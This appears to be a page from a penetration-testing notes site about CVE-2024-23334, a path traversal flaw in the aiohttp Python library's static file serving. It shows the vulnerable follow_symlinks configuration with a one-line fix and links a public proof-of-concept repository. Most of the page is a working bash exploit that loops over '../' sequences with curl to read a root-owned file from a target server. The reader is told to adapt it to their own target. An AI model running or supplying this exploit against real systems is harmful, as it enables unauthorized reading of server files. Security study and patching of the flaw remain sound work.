AIOHTTP

Python library that supports both client and server side of HTTP protocol and Web-Sockets (asyncio)

LogoWelcome to AIOHTTP โ€” aiohttp 3.11.13 documentation
Documentation
Logoaiohttp vulnerabilities | SnykFind detailed information and remediation guidance for vulnerabilities and misconfigurations.
Vulnerabilities
CVE-2024-23334 - Path Traversal

Versions : 1.0.5 - 3.9.2

  • This vulnerability has been present since the introduction of the follow_symlinks parameter:

Vulnerable Code
pp.router.add_routes([
    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
])

  • More information

  • Look at the requests or fuzz the site to look for directories leaking static resources.

PoC

git clone https://github.com/z3rObyte/CVE-2024-23334-PoC

  • Update the URL , payload , and file variables in the PoC to match your target:

Example
#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt" # without the first /

for ((i=0; i<15; i++)); do
   payload+="$string"
   echo "[+] Testing with $payload$file"
   status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
   echo -e "\tStatus code --> $status_code"

   if [[ $status_code -eq 200 ]]; then
       curl -s --path-as-is "$url$payload$file"
       break
   fi
done
PreviousMagentoNextHashiCorp

Last updated